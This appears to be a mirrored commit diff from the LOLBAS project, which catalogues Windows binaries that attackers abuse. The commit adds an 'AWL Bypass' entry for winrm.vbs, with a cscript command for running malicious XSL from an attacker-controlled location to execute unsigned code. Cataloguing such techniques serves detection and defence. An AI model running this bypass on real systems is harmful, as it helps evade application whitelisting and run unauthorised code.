mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 06:49:09 +01:00
Added AWL Bypass
This commit is contained in:
parent
f8e9ac5a0a
commit
783b4f3d9f
@ -28,6 +28,14 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
|
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
|
||||||
|
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
|
||||||
|
Usecase: Execute aribtrary, unsigned code via XSL script
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1216
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full Path:
|
||||||
- Path: C:\Windows\System32\winrm.vbs
|
- Path: C:\Windows\System32\winrm.vbs
|
||||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||||
@ -42,6 +50,8 @@ Resources:
|
|||||||
- Link: https://github.com/enigma0x3/windows-operating-system-archaeology
|
- Link: https://github.com/enigma0x3/windows-operating-system-archaeology
|
||||||
- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
|
- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
|
||||||
- Link: https://twitter.com/bohops/status/994405551751815170
|
- Link: https://twitter.com/bohops/status/994405551751815170
|
||||||
|
- Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
|
||||||
|
- Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt Nelson
|
- Person: Matt Nelson
|
||||||
Handle: '@enigma0x3'
|
Handle: '@enigma0x3'
|
||||||
@ -51,4 +61,4 @@ Acknowledgement:
|
|||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
- Person: Red Canary Company cc Tony Lambert
|
- Person: Red Canary Company cc Tony Lambert
|
||||||
Handle: '@redcanaryco'
|
Handle: '@redcanaryco'
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user